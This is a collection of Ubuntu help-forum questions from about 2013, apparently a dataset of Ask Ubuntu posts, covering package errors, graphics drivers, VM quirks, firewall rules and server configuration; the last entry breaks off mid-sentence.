267850	how do i fix too many errors in libghc	i was installing eclipse on a virtual machine with ubunutu 12.04 . my computer froze up and crashed in the middle of the installation and when i rebooted and tried to install it again i got this error . selecting previously unselected package libghc-parsec3-dev . dpkg : unrecoverable fatal error , aborting : files list file for package 'libghc-blaze-html-dev ' is missing final newline e : sub-process /usr/bin/dpkg returned an error code ( 2 ) so i ran this sudo dpkg -- configure -a and got this error dpkg : error processing libghc-unordered-containers-prof ( -- configure ) : dependency problems - leaving unconfigured dpkg : too many errors , stopping errors were encountered while processing : ghc libghc-semigroups-dev libghc-unordered-containers-dev libghc-conduit-dev libghc-void-dev libghc-blaze-builder-dev libghc-case-insensitive-dev libghc-monad-control-dev libghc-lifted-base-dev libghc-blaze-builder-conduit-dev libghc-base64-bytestring-dev libghc-hunit-dev libghc-hunit-prof libghc-transformers-dev libghc-transformers-prof libghc-text-dev libghc-bzlib-dev libghc-syb-dev libghc-transformers-base-prof libghc-boolean-dev libghc-polyparse-dev libghc-cereal-dev libghc-vector-dev libghc-byteorder-dev libghc-case-insensitive-prof libghc-conduit-prof libghc-semigroups-prof libghc-void-prof libghc-blaze-builder-conduit-prof libghc-bzlib-prof libghc-attoparsec-dev libghc-mtl-dev libghc-mtl-prof libghc-polyparse-prof libghc-dlist-dev libghc-attoparsec-conduit-dev ghc-prof libghc-primitive-dev libghc-aeson-dev libghc-vector-prof libghc-transformers-base-dev libghc-blaze-html-dev libghc-base-unicode-symbols-dev libghc-resourcet-dev libghc-dlist-prof libghc-hashable-prof libghc-monad-control-prof libghc-cereal-prof libghc-hashable-dev libghc-ansi-terminal-dev libghc-unordered-containers-prof processing was halted because there were too many errors . what do i do next ?
267857	nexus 10 gets stuck `` google '' boot screen	i just tried to install ubuntu touch on my nexus 10 according to your manual . the terminal said at the end that i have to wait for a reboot of my nexus 10 and afterwards it will run on ubuntu . unfortunately i get stuck on the black screen after the screen with the white google text shortly after booting . how can i get the system running and if there are any problems , how can i reflash android ? i tried it with an android tool but it can not find my device it says something with `` no adb '' .
267859	ubuntu 12.10 in vmware player pointer problems	ubuntu 12.10 works flawlessly in vmware player 5.0.2 except for one major issue - cursor is rendered in the wrong location ( a pixel , or so , to the left and to the top ; same thing observed in virtualbox ) : this would n't bother me so much if that did n't actually cause some things to misbehave ( in vmware player only , virtualbox is fine ) . whenever i try to use a scrollbar , i have to carefully press it , move the pointer away from the edge , and then scroll , because otherwise ( if i keep the cursor at the edge ) it just wo n't get properly detected , and the scrollbar will jump semi-randomly . same thing happens on the left edge as well . another 'kind of ' related issue is that i use a trackpoint and when i hold the middle button - i ca n't scroll ( while in virtualbox i can ) . possibly useful info : host : windows 8 64bit machine : thinkpad t530 cpu : i7-3720qm ( supports virtualization ) gpu : hd4000 resolution : 1920x1080
267860	i forgot my password ubuntu 12.10	i travelled from south america and i installed my old hdd and i forgot my sudo password . please help me in retrieving it . thank you .
267863	declaring dependencies in upstart	it seems as if the accepted way to specify a dependency of service a on service b in upstart is to work in the reverse dependency direction : give service b a start on starting a stanza . i 'd like to avoid that for two reasons : it seems bizarre to modify b 's config file when a new service that depends on it comes along : the new service should declare its dependencies ; b should n't have to know about them . i 'd like to automate the construction of service hierarchies by proceeding topologically from a dependency graph which is already constructed and it would be inelegant to have to convert it into a reverse dependency graph just for this . i thought i could just start the dependent services in a pre-start script stanza in the conf file , but it appears that that wo n't work if i also have setuid and setgid stanzas -- -since then the pre-start script would be run with that user/group . is there an idiomatic way to do this ( i.e . declare dependencies rather than reverse dependencies ) ? this answer is not what i want since i do n't want to also have to write a non-upstart init script . ( i suppose start on started b for a would work in this case , but i 'm not sure if that would work if a had multiple dependencies : would start on started b and started c work ? if i start b and then c , will a get both events at once ? also this gets the logic wrong even in the one-dependency case : start on started b says that b 's having started is a sufficient condition for starting a . but i want to say that b 's having started is a necessary condition for starting a , and a condition that the action of starting a should make true . )
267866	installing gphoto2 to use the python binding not working	i want to use the python bindings that are available for gphoto2 and this requires a build from their tarballs . my first step is simply to build gphoto2 such that it recognizes my camera and thus far i have not been successful . everything appears to build successfully , my camera is listed as a type that should be recognized ... but it is not . however , when i install gphotot2 via apt-get it works . my testing is being done on clean copies of ubuntu running as vms to keep libraries from getting intermingled . help would be appreciated !
267869	ubuntu 12.10 upgrade has completely crashed my computer	i am a great ubuntu fan , but what i 'm experiencing is quite freaky . here is my story : i loaded ubuntu 10.04 some time back . i tried version 11 and hated it . so i went back to 10.04 . over time canonical informed me that they would stop supporting it and i declined all requests for upgrades and new installations . it was working fine - if it 's not broke , do n't fix it ( my reasoning ) . okay a little more time passes by and i install version 12.10 onto my girlfriend 's computer and ... wow what an amazing software . okay so now i 'm impressed and i decide to upgrade my 10.04 . the worst mistake . for starters there is no longer an upgrade feature in the `` software centre '' . so i go the route of getting a cd prepared and do the upgrade . my computer has totally crashed . no matter what i do , ubuntu wo n't load up . something appears to be wrong with corrupted `` squashfs files '' . now for the real freaky part . it appears a series of files on my 10.04 are corrupt and i can not format my hard drive and start from scratch , even when i try load up from the cd/dvd . simply put ubuntu wo n't work . now for the freaky stuff : so i had 10.04 for quite a long while and i was able to disconect all the requests for software upgrades and disconnect any `` searching for new software '' . in essence my software centre went dead as far as looking for software . for one or other reason i installed nethogs which allowed me to check who ( if anyone ) is using my internet connection . i saw it register my name every time i connected to the internet ( whether email or internet surfing ) , but i was stumped to see that `` root '' would log onto the net and go to some site described by numbers at strange hours of the night or morning . is it posible that someone hacked into my ubuntu ? or did canonical use their `` root '' status to log into my computer ? is it possible i got a virus on ubuntu ? what ever the story , i wish i could simply format my hard drive and start from scratch . can anyone help ?
267870	ubuntu update problems	root @ sandeep-vaio : ~ # apt-get update e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/ e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? im unable to install programs from ubuntu software center . under about this computer it shows checking for updates all the time . also some times its showing a system error regularly . ill post it when i encounter it again . im new to linux so please provide me step by step procedure . thank you.. : )
267871	run ubuntu alongside my current os ( windows vista )	i would like to run ubuntu alongside my current os . it is windows vista . do i just download ubuntu or do i have to do something special ? thanks .
267877	configuring vsftpd	i 've got a problem connecting to my remote server using vsftpd . from the documentation , it seems there should be little to no configuration necessary if i just want to connect with my username/password . however , i keep getting an error message saying 530 login incorrect . login failed . i 'm running ubuntu 12.04 lts . the vsftpd version is current . below is my configuration ; i 've deleted all the commented text so it 's easier to read here . can anyone see what my problem is ? listen=yes anonymous_enable=no local_enable=yes write_enable=yes dirmessage_enable=yes use_localtime=yes xferlog_enable=yes connect_from_port_20=yes secure_chroot_dir=/var/run/vsftpd/empty rsa_cert_file=/etc/ssl/private/vsftpd.pem
267878	how to keep x-server running via 'ssh -y ' after closing shell ?	my name is chris and i have trouble to run a python-script on a server . i try to run a python script , that makes use of the python module wx , on a server . therefor i open a shell connect to the server via 'ssh -y ' then im running the script with an ' & ' at the end . everything works fine bunt when i logout the program causes an internal error ( something with x display ... i do n't remember exact ) . it 's the same error i get when i connect without ' -y ' . so what can i do if i want to logout and keep the x-server running ? or is it something else ? thank you for your help !
267885	intel hd3000 with hdmi output causes usb mouse and keyboard conflicts ?	i really do n't know where to look for help with this problem , so i 'm starting here . i am running a clean install of 12.10 , on gigabyte z68a-dh3-b3 mobo , core i5 2500k , integrated intel hd 3000 ( sandy bridge ) . dual monitor setup ; samsung ( 1440x900 ) on dvi and acer ( hd 1080p ) on hdmi . whenever the hdmi output is `` active '' , i.e . acer screen configured `` on '' in display settings , my wireless keyboard and mouse are very unresponsive - characters dropped while typing , and mouse super slow . when i configure the acer screen `` off '' , everything immediately returns to normal . the questions i have are is this an intel graphics driver issue ? a usb issue ? an xorg issue ? just do n't know where to start .
267887	non-pae system updating to pae kernels ?	i just had an ubuntu system of mine completely die on me after upgrading it and now i am confused . basically , it is an older machine ( intel p3 , 512mb ram , etc ) that i use as a command line only test bed . it 's cpu does not support pae extensions . pae is mandatory when installing 12.04 lts so what i basically did was install 11.10 x86 and then updated to 12.04 lts and that worked fine . it even detected the cpu did n't support pae , ignored the pae kernels , and updated all the relevant non-pae packages correctly ( including using non pae kernels under 12.04 lts ) . fast forward a few months as i had n't used the thing so i wanted to update it . did apt-get update and it listed a bunch of packages including a new kernel . at the top , it did saw something along the lines of `` these packages are being ignored '' and then listed several *pae packages . so i proceeded with the update as everything it was going to do look ok to me , however , the update failed ( see screenshot below ) and now the machine wo n't even boot . what is going on ? is it not possible to update 12.04 lts anymore on non-pae machines ? how come it tried to ( seemingly ) update *pae packages when my cpu ca n't support them ? i feel like this is the root of the problem but if you have any other idea 's or suggestions , please mention them !
267890	iptables and skype	does anyone here use iptables with skype ? the only way i have been able to get it working so far is to allow all the high ports- something like iptables -a output -p udp -- dport 1024:65535 -j accept iptables -a output -p tcp -- dport 1024:65535 -j accept iptables -a input -p udp -- dport 1024:65535 -j accept iptables -a input -p tcp -- dport 1024:65535 -j accept which is obviously less than ideal . the problem is as far as i can tell the ports skype uses are somewhat random . i was hoping it might be possible to allow application level firewalling by using setuid or setguid , for example sudo addgroup skypegrp sudo usermod theuser -g skypegrp sudo chgrp skypegrp /usr/bin/skype chmod g+s /usr/bin/skype iptables -a output -m owner -- gid-owner skypegrp -j accept but this did n't seem to work . perhaps other have a better solution ?
267891	ubuntu 12.04 google connection problem	i have problem with connection to the google services . sometimes when i try to open a google site or any site where there was a google ad , firefox says `` connection ... '' and nothing happens . then , after some minutes , the following text appears : `` the connection has timed out '' . i tried to use the chromium instead of firefox , but it did not work . other pages and google on other computers ( winxp ) in the local network are working , but on my computer ( where i use ubuntu ) they work only after i restart the system . i wonder why ubuntu does this , and how can i solve it . thanks for the help . peter p.s . : sorry for my bad english , i am from hungary , and i am learning the language .
267895	os uninstaller killed windows 7 , ca n't boot	i used os uninstaller started from a live cd to remove old tries to install ubuntu and zorin ( and 2 already installed ubuntu distros ) , but now when i try to boot , the pc tells me there 's no boot device . my windows 7 install and restore cd 's do n't want to boot . i checked the filesystem on my hdd , and windows files are ok. how to make it start ? any help is appreciated .
267897	grub no such device error while usb storage device plugged in	i have installed my ubuntu 12.04 from usb . i have prepared my usb with unetbootin . when i try to boot my pc while any usb storage device plugged in i am getting this error : error : no such device : ac6e5541- ... if i remove usb storage devices on boot pc boots normally . i am using a hp dv9087ea laptop which has two hard drives . one of them like a external drive . windos does not sport to instal that drive but ubuntu does not complain to install on that drive . so i have a dual boot install : windows on first drive and ubuntu on secon drive . grub is installed on first drive . here is the result of the bootinfoscript : http : //paste.ubuntu.com/5622335/ how can i fix this ?
267898	create a new repository/branch using bzrlib	i 'm trying to programmatically create a new blank bazaar branch/repo , tantamount to running brz init . i 've tried several different routes from the bzrlib documentation but so far have n't succeeded . these failures are listed below : from bzrlib import repository r = repository.repository.open ( '/tmp/testing ' ) r = repository.repository.create ( '/tmp/testing ' ) from bzrlib import branch b = branch.branch.create ( '/tmp/testing ' ) b = branch.branch.open ( '/tmp/testing ' ) all result in failures that /tmp/testing is not a branch .
267900	graphics driver for ubuntu 12.10	hello i am new to ubuntu and i am having problems locating the graphics driver to install . i have a pentium 4 ht 3.2 dual core , i tried the command jockey-kde but found out that is for an amd 64 processor . can someone please point me in the right direction . thank you .
267901	ubuntu gui not booting	i have the following problem : old pc - > tried to install ubuntu via live-cd ( 12.04 / 12.10 ) - > as soon as the desktop starts loading i get stuck at a black blank screen . no wallpaper , no gui , no nothing . i can not load a terminal via ctrl + alt + f1 . i tried installing ubuntu server ( 12.04 ) which worked fine . after installing i did a sudo apt-get install ubuntu-desktop which led to the exact same problem as with the live-cds . i am clueless as to what is going wrong here . i used ubuntu on this pc before without problems .
267913	why does firefox display an й instead of an é ?	this has bugged me for a while , but on many pages viewed with firefox on ubuntu ( but not on windows or osx ) any é ( e with an acute accent ) is replaced by a й ( the cyrillic short i ) . there are probably other examples , but this is the one i encounter all the time . why is this , and is there anything i can do to get firefox to display the characters properly ? a screenshot that should read résumé : here 's an example of a page where this happens : http : //www.theonion.com/articles/company-immediately-calls-job-applicant-upon-seein,31669/ interestingly , the title displays fine . looking at the page source the characters that display correctly are simply é while those that do not are written as & eacute , & amp ; eacute or & # 233 ( i think ) .
267916	how can i get chromium-browser to run fullscreen ( not kiosk ) in 12.04 ?	i have created a restricted user which logs in automatically and chromium runs the default home page with the screen starting maximized but i want it to run in fullscreen ( f11 ) mode . i tried kiosk mode but i do n't want to be that restricted and it does n't seem to behave properly at all ( keyboard is almost broken ) . i would consider digital signage software but do n't really want anything client/server . i just want the machine to boot straight into fullscreen mode . does this work for firefox ?
267920	how do i convert a scanned pdf into a pdf with text	i have scanned about 80 pages into gray scale pdf ( image format ) . the end size of the file is about 70mb , which is very huge . now i am looking for a method to convert the grayscale image-based pdf file into a simple black/white text-based pdf file . i have done many attempts with gs but with no success ( only a few percent recovery ) . if any expert has some idea , kindly let me know .
267926	change background from terminal for user as root [ gnome3 ]	i have a script that downloads the bing images and then sets the background . this script is running in anacron daily , so its run as root . now it changes the background for root but not for user . how can i make it change the background for the user ? # set the gnome3 wallpaper display=:0 gsettings_backend=dconf gsettings set org.gnome.desktop.background picture- uri ' '' file : // ' $ savedir $ picname ' '' ' # set the gnome 3 wallpaper picture options display=:0 gsettings_backend=dconf gsettings set org.gnome.desktop.background picture-options $ picopts`
267929	12.10 drag and drop not working	that 's just it . i click on a file on the desktop with my mouse , drag it to another location on the desktop , or to an open folder , and ... .it zooms right back into the original position when i let go of the mouse button . am i a fool ? it seems like a rather obvious question i could find with a search , but all the answers are very specific to problems i am not having .
267931	12.10 blue screen , no panels	i just upgraded to ubuntu 12.10 . the desktop is stuck on a blue screen , the panel bars at the top and bottom do n't show up . my 2 screens are set to low resolution and mirror . i can open a terminal with c-m t. here 's my .xsession-erros : http : //pastebin.com/usxbzhsl a good deal of the errors are like : ( gnome-settings-daemon:579 ) : gtk-warning ** : theme parsing error : gtk-widgets-borders.css:33:52 : unrecognised image file format here 's what i 've tried : reinstall libgdk-pixbuf2 gdk-pixbuf-query-loaders -- update-cache give me a seg . fault ( http : //pastebin.com/yblssi0r ) sudo apt-get install -- reinstall ubuntu-desktop when i go to all settings/displays and try to change the resolution of a screen , i get gdbus.error : org.freedesktop.dbus.error.unknownmethod : no such interface `org.gnome.settingsdaemon.xrandr_2 ' on object at path /org/gnome/settingsdaemon/xrandr however , i can change the display settings using arandr . i created a new user and the problems persist . should i try to update to ubuntu 13.04 ?
267934	i have compiled the 3.8.2 kernel and the fan does n't stop after resume from suspend 12.04.02 lts xubuntu	kernel config for hp 6730b notebook i ca n't figure out what i did that 's causing this issue . this is xubuntu latest version 12.04.02 lts link for kernel config : http : //pastebin.com/auywdndr any sugestions ? thank you for any help . sensors acpitz-virtual-0 adapter : virtual device temp1 : +41.0°c ( crit = +256.0°c ) temp2 : +43.0°c ( crit = +110.0°c ) temp3 : +43.0°c ( crit = +105.0°c ) temp4 : +31.4°c ( crit = +110.0°c ) temp5 : +100.0°c ( crit = +110.0°c ) coretemp-isa-0000 adapter : isa adapter core 0 : +39.0°c ( high = +105.0°c , crit = +105.0°c ) core 1 : +37.0°c ( high = +105.0°c , crit = +105.0°c ) acpi config : 0.443879 ] pnp : pnp acpi : found 13 devices [ 0.443881 ] acpi : acpi bus type pnp unregistered [ 2.439310 ] acpi : deprecated procfs i/f for ac is loaded , please retry with config_acpi_procfs_power cleared [ 2.439390 ] acpi : ac adapter [ ac ] ( on-line ) [ 2.439463 ] acpi : sleep button [ slpb ] [ 2.439537 ] acpi : lid switch [ lid ] [ 2.439575 ] acpi : power button [ pwrf ] [ 2.439649 ] acpi : fan [ fan0 ] ( off ) [ 2.439693 ] acpi : fan [ fan1 ] ( off ) [ 2.439731 ] acpi : fan [ fan2 ] ( off ) [ 2.439773 ] acpi : fan [ fan3 ] ( off ) [ 2.439811 ] acpi : fan [ fan4 ] ( off ) [ 2.439861 ] acpi : requesting acpi_cpufreq [ 2.441224 ] acpi : acpi_idle registered with cpuidle [ 2.454302 ] acpi : thermal zone [ dtsz ] ( 78 c ) [ 2.470887 ] acpi : thermal zone [ cpuz ] ( 81 c ) [ 2.474253 ] acpi : thermal zone [ sknz ] ( 63 c ) [ 2.486164 ] acpi : thermal zone [ batz ] ( 30 c ) [ 2.491937 ] acpi : thermal zone [ fdtz ] ( 25 c ) [ 2.555275 ] acpi : deprecated procfs i/f for battery is loaded , please retry with config_acpi_procfs_power cleared [ 2.555281 ] acpi : battery slot [ bat0 ] ( battery present ) [ 2.555329 ] acpi : deprecated procfs i/f for battery is loaded , please retry with config_acpi_procfs_power cleared [ 2.555335 ] acpi : battery slot [ bat1 ] ( battery absent ) [ 3.753101 ] acpi exception : ae_aml_package_limit , index ( 0x0000000000000005 ) is beyond end of object ( 20121018/exoparg2-418 ) [ 3.753109 ] acpi error : method parse/execution failed [ \_sb_.pci0.gfx0._dod ] ( node ffff88013aa322f8 ) , ae_aml_package_limit ( 20121018/psparse-537 ) [ 3.753116 ] acpi exception : ae_aml_package_limit , evaluating _dod ( 20121018/video-1163 ) [ 3.755247 ] acpi : video device [ gfx0 ] ( multi-head : yes rom : no post : no ) [ 4.103636 ] ata1.00 : acpi cmd ef/10:03:00:00:00 : a0 ( set features ) filtered out [ 4.113621 ] ata1.00 : acpi cmd ef/10:03:00:00:00 : a0 ( set features ) filtered out [ 4.436787 ] ata2.00 : acpi cmd ef/10:03:00:00:00 : a0 ( set features ) filtered out [ 4.441624 ] ata2.00 : acpi cmd ef/10:03:00:00:00 : a0 ( set features ) filtered out [ 12.240143 ] parport_pc 00:09 : reported by plug and play acpi [ 12.434379 ] acpi warning : 0x0000000000000428-0x000000000000042f systemio conflicts with region \pmio 1 ( 20121018/utaddress-251 ) [ 12.434387 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 12.434391 ] acpi warning : 0x0000000000000530-0x000000000000053f systemio conflicts with region \gpio 1 ( 20121018/utaddress-251 ) [ 12.434394 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 12.434395 ] acpi warning : 0x0000000000000500-0x000000000000052f systemio conflicts with region \gpio 1 ( 20121018/utaddress-251 ) [ 12.434398 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 260.354206 ] tg3 0000:85:00.0 : system wakeup enabled by acpi [ 263.508180 ] snd_hda_intel 0000:00:1b.0 : power state changed by acpi to d3hot [ 263.524145 ] ehci-pci 0000:00:1d.7 : system wakeup enabled by acpi [ 263.540109 ] uhci_hcd 0000:00:1d.2 : system wakeup enabled by acpi [ 263.540193 ] uhci_hcd 0000:00:1d.1 : system wakeup enabled by acpi [ 263.540275 ] uhci_hcd 0000:00:1d.0 : system wakeup enabled by acpi [ 263.540317 ] ehci-pci 0000:00:1a.7 : system wakeup enabled by acpi [ 263.556104 ] uhci_hcd 0000:00:1a.2 : system wakeup enabled by acpi [ 263.556188 ] uhci_hcd 0000:00:1a.1 : system wakeup enabled by acpi [ 263.556271 ] uhci_hcd 0000:00:1a.0 : system wakeup enabled by acpi [ 263.556663 ] acpi : preparing to enter system sleep state s3 [ 263.700482 ] acpi : low-level resume complete [ 263.714676 ] acpi : waking up from system sleep state s3 [ 263.876133 ] uhci_hcd 0000:00:1a.0 : system wakeup disabled by acpi [ 263.876205 ] uhci_hcd 0000:00:1a.1 : system wakeup disabled by acpi [ 263.876275 ] uhci_hcd 0000:00:1a.2 : system wakeup disabled by acpi [ 263.892060 ] ehci-pci 0000:00:1a.7 : system wakeup disabled by acpi [ 263.912033 ] snd_hda_intel 0000:00:1b.0 : power state changed by acpi to d0 [ 263.928473 ] uhci_hcd 0000:00:1d.0 : system wakeup disabled by acpi [ 263.928540 ] uhci_hcd 0000:00:1d.1 : system wakeup disabled by acpi [ 263.928608 ] uhci_hcd 0000:00:1d.2 : system wakeup disabled by acpi [ 263.944058 ] ehci-pci 0000:00:1d.7 : system wakeup disabled by acpi [ 264.112308 ] tg3 0000:85:00.0 : system wakeup disabled by acpi [ 264.358813 ] ata2.00 : acpi cmd ef/10:03:00:00:00 : a0 ( set features ) filtered out [ 264.364213 ] ata1.00 : acpi cmd ef/10:03:00:00:00 : a0 ( set features ) filtered out [ 264.371521 ] ata2.00 : acpi cmd ef/10:03:00:00:00 : a0 ( set features ) filtered out [ 264.374199 ] ata1.00 : acpi cmd ef/10:03:00:00:00 : a0 ( set features ) filtered out
267936	how do i get rid of `` broken nvidia randr detected , falling back to randr 1.0 '' ?	my short question is : how do i get rid of the randr error below , while still using a proprietaty nvidia driver package ( e.g . 304 ) ? the gore follows . a fresh install of wine 1.5 ( latest , from ubuntu-wine ppa ) leaves me with the following when i run winecfg for the spanking-first time , and note i have not touched winetricks yet , nor does ~/.wine exist : me @ mine : ~ $ winecfg wine : created the configuration directory '/home/me/.wine' **err : winediag : xrandr12_init_modes broken nvidia randr detected , falling back to randr 1.0 . please consider using the nouveau driver instead . ** [ err repeats at least 4x more ] fixme : storage : create_storagefile storage share mode not implemented . [ fixme repeats at least 2x more ] err : mscoree : loadlibraryshim error reading registry key for installroot ... fixme : storage : create_storagefile storage share mode not implemented . fixme : iphlpapi : notifyaddrchange ( handle 0x112e8d0 , overlapped 0x112e8dc ) : stub wine : configuration in '/home/me/.wine ' has been updated . **err : winediag : xrandr12_init_modes broken nvidia randr detected , falling back to randr 1.0 . please consider using the nouveau driver instead . ** [ err repeats sporadically ] removing the current nvidia packages and ( re ) installing nouveau gets rid of the randr error , but gives me copious errors when i launch anything requiring shader model 3 , e.g . eve online , my only motivation to wrestle with wine , currently . for it to run , i know i need the proprietary driver , and so nouveau is not a solution for me - unless y'all know how to get sm3 support with the open stuff currently available , which would be just fabulous and tell me please . i have gathered from winehq that the fixmes and the majority of errs are an innocuous `` do n't look behind the curtain '' type of wish-list verbosity . this broken nvidia randr thing , though , is something i 'd like to deal with in order to get to , well , the other graphics issues i 'm crossing my fingers about ( in particular , a manual modification of wine1.5 's shader model 3 detection routine to allow for my nvidia geforce go 7900 gs , which is one of the few sm3-compliant laptop gpu 's to come out before sm4-type features were also implemented , leaving it out of consideration by the current wine developers who seem to use sm4-ish flags to test for sm3 suport ) . in order to tinker with my other woes , i must first eliminate the non-starters . this randr is one . i think it 's different from the other related posts in that i have not attempted to run anything other than winecfg itself to elicit the error , as opposed to a third party program . ps `uname -a` -- > linux aestrid 3.8.0-12-generic # 21-ubuntu smp thu mar 7 17:17:00 utc 2013 i686 i686 i686 gnu/linux pps `raring` up-to-the-minute update/dist-upgrade how to solve this ? ppps if henri verbeet is listening .
267942	keep getting warnings about low disk space on home volume	about once every other day i receive a warning about low disk space in /home . when i open the disk usage analyzer it says my largest folder /home/chris/music occupies the most space at 72 % of 26.6gb , but it does n't show what file ( s ) is causing this to occur . when i reboot my system i have enough space again . yes /home is on a separate partition . i partitioned my system so i could switch distributions if i needed to leaving /var and /home as is . there must be some log file that builds up over time and causes this problem and then gets pruned when i reboot the system , but i ca n't seem to find it ! please help . i am running ubuntu 12 w/ gnome3 . the current work-around of rebooting is getting annoying !
267949	trying to compile magic set editor	when i try to compile magicseteditor i get these errors : g++ -dhave_config_h -i . -i./src -i/usr/lib/i386-linux-gnu/wx/include/base-unicode-debug-2.8 -i/usr/include/wx-2.8 -d_file_offset_bits=64 -d_large_files -d__wxdebug__ -dwxuse_gui=0 -pthread -i . -wall -o2 -mt ./src/magicseteditor-main.o -md -mp -mf ./src/.deps/magicseteditor-main.tpo -c -o ./src/magicseteditor-main.o `test -f './src/main.cpp ' || echo './'`./src/main.cpp in file included from ./src/util/prec.hpp:96:0 , from ./src/main.cpp:9 : ./src/util/string.hpp:20:38 : fatal error : boost/preprocessor/cat.hpp : no such file or directory compilation terminated . make : *** [ src/magicseteditor-main.o ] error 1
267952	apple magic mouse 'successfully connected but doesnt work '	hi i 've just installed 13.04 on my machine ( but had the same problem with 12.10 ) . the machine is a 2012 imac 21 '' . when i go to bluetooth settings , the system detects my magic mouse . it will allow me to input '0000 ' as the passkey and thinks its paired successfully . the mouse led keeps flashing however , and the mouse does n't do anything . when i go into the bluetooth settings the mouse shows as present but not connected and when i try to change the swith to 'on ' it wont stay on . what am i doing wrong ? thanks
267954	how to remove a foreign architecture ?	on ubuntu 12.04 lts x64 , we 'd like to remove the i386 foreign architecture it comes with , but i do n't see a `` dpkg '' command to do this cleanly . in stuck with foreign-architecture=i386 when using apt-get , the user is advised to just remove the line from /etc/dpkg/dpkg.cfg.d/multiarch , i can do that ( or even remove that file altogether ) , but i was wondering whether there is a more `` appropriate '' way to do that . the reason we want to do that is that we maintain a large number of continuous integration agents using puppet and want to stick to `` pure 64 '' . we install our own debian packages from our own maintained reposiroty and this fails unless we provide an i386 version of the package . i 'm aware that it 's possible to override the architecture in the specific repository configuration but it 'll be cleaner to just disable the none-64 architecture altogether .
267956	how does juju `` co-exist '' with chef , taking the automation process `` one step further '' ?	it is clear from this post that juju sits at a different layer than chef server . juju sits at the orchestration or service layer , while chef sits more at the individual server or configuration layer . at one of canonical 's main juju pages , it states that juju is designed to `` co-exist '' with tools like chef and puppet , taking the process `` one step further '' . i have scoured the internet for the past several weeks on this subject and can not find a good explanation of how , though , a tool like chef will co-exist with juju . so , to breakdown the overarching question in the title : ( particular interest in juju working together with a chef server ) what is an example of a charm `` written in chef '' ? is it simply a charm written in bash that then calls the chef-solo command ? if so , can a charm call the chef-client command to work in concert with a chef server ? where is the overlap between juju and chef ? for instance , the apache2 charm has its config-changed hook where it makes config changes that , in the chef world , would take place in a recipe by applying a template file . if a juju charm were to work along with a chef cookbook on deploying an apache2 service ( cluster ) it would almost seem that an `` apache2-chef '' charm would have to be written so that you could separate out the tasks . in this case , the apache2 charm in the charm store would be less than helpful . if you have chef roles applied to nodes ( service units ) that are deployed/managed by juju and your sysadmin decides to change the firewall rules for a particular server role and does this in the chef role , is juju going to ever overwrite those changes ? more simply , can juju be a chef server wrapper , like ironfan ? i view chef server as the how whereas juju can do the how , but also brings what to the table . meaning that the real current state of services and machines can be queried and acted upon . you ca n't do this in chef server . my goal is to bring juju 's awareness and service orchestration capability into a chef server-managed infrastructure . it almost seems that a whole set of charms would have to be written where all chef-managed tasks/config info are left out . i would love to hear weigh-ins from someone at canonical ( like jorge castro ) and from opscode ( like a. jacob or j. timberman ) .
267958	xfce4-terminal goes 'blank ' occasionally while in drop-down mode	it happens whilst i hit my keyboard shortcut to access the terminal . the window responds to mouse and keyboard input , but it will not draw itself properly . the only way to restore the terminal is to quit the program and restart it .
267960	where can i find a compatible graphics driver for an old unsupported graphics card ?	so here 's the problem . i have a rather old laptop , bought it in 2007 . it 's an acer aspire 5100-5023 if that means anything to anyone . it has an integrated graphics card , ati radeon xpress 1100 . ati ( i guess amd now ) no longer provides legacy support for this card . now i have ubuntu 12.10 . it has xorg 1.13 . unity wont run correctly with out that version of xorg . however , any existing catalyst drivers are n't compatible with xorg 1.13 . the opengl drivers i currently have seem to be sufficient for my usualy activities . any graphics problems encountered thus far have been tolerable , i 'm even at 1920x1080 resolution ( i have a monitor attached , the built in screen on my laptop could never dream to do that . it 's really a dinosaur now . ) the problem arises when i try to run games . particularly i 've been trying to run starcraft 2 through playonlinux which is a front end for wine . i have to enable the debugger to see what 's wrong and it points to opengl not being able to render a 3d environment . particularly err : winediag : wined3d_dll_init the glsl shader backend has been disabled . you get to keep all the pieces if it breaks . but that 's irrelevant information to my problem . so here 's my question : what is the best alternative graphics driver for my graphics card ? the proprietary drivers are not compatible with the current version of xorg while opengl drivers are inefficient . there are probably people working on creating a compatible driver , but i figure i 'd ask to see if there are any projects out there for creating the driver that i so need . chances are there are other older graphics cards that are in need of compatible drivers . with such a need there is bound to be a solution . this information may or may not be relevant . the output of dmesg | grep -i radeon is [ 64.010927 ] [ drm ] radeon defaulting to kernel modesetting . [ 64.010933 ] [ drm ] radeon kernel modesetting enabled . [ 64.011036 ] radeon 0000:01:05.0 : power state changed by acpi to d0 [ 64.011042 ] radeon 0000:01:05.0 : power state changed by acpi to d0 [ 64.012906 ] radeon 0000:01:05.0 : vram : 256m 0x0000000070000000 - 0x000000007fffffff ( 256m used ) [ 64.012911 ] radeon 0000:01:05.0 : gtt : 512m 0x0000000080000000 - 0x000000009fffffff [ 64.012954 ] [ drm ] radeon : irq initialized . [ 64.022849 ] [ drm ] radeon : 256m of vram memory ready [ 64.022852 ] [ drm ] radeon : 512m of gtt memory ready . [ 64.053820 ] [ drm ] radeon : 3 quad pipes , 1 z pipes initialized . [ 64.074991 ] radeon 0000:01:05.0 : wb enabled [ 64.075003 ] radeon 0000:01:05.0 : fence driver on ring 0 use gpu addr 0x0000000080000000 and cpu addr 0xf04fe000 [ 64.799739 ] [ drm ] radeon : ring at 0x0000000080001000 [ 64.812571 ] [ drm ] radeon legacy lvds backlight initialized [ 64.812576 ] [ drm ] radeon display connectors [ 64.814687 ] [ drm ] radeon : power management initialized [ 65.090504 ] fbcon : radeondrmfb ( fb0 ) is primary device [ 65.090827 ] fb0 : radeondrmfb frame buffer device [ 65.090840 ] [ drm ] initialized radeon 2.18.0 20080528 for 0000:01:05.0 on minor 0 the output of sudo lshw -c display is *-display description : vga compatible controller product : rs482 [ radeon xpress 200m ] vendor : advanced micro devices [ amd ] nee ati physical id : 5 bus info : pci @ 0000:01:05.0 version : 00 width : 32 bits clock : 66mhz capabilities : pm vga_controller bus_master cap_list rom configuration : driver=radeon latency=66 mingnt=8 resources : irq:17 memory : c0000000-cfffffff ioport:9000 ( size=256 ) memory : b0100000-b010ffff memory : b0120000-b013ffff also when i go to see the graphic 's menu under system information it said that the driver was unknown . however , this time when i went to check it it said `` gallium 0.4 on ati rs480 `` while earlier today it was 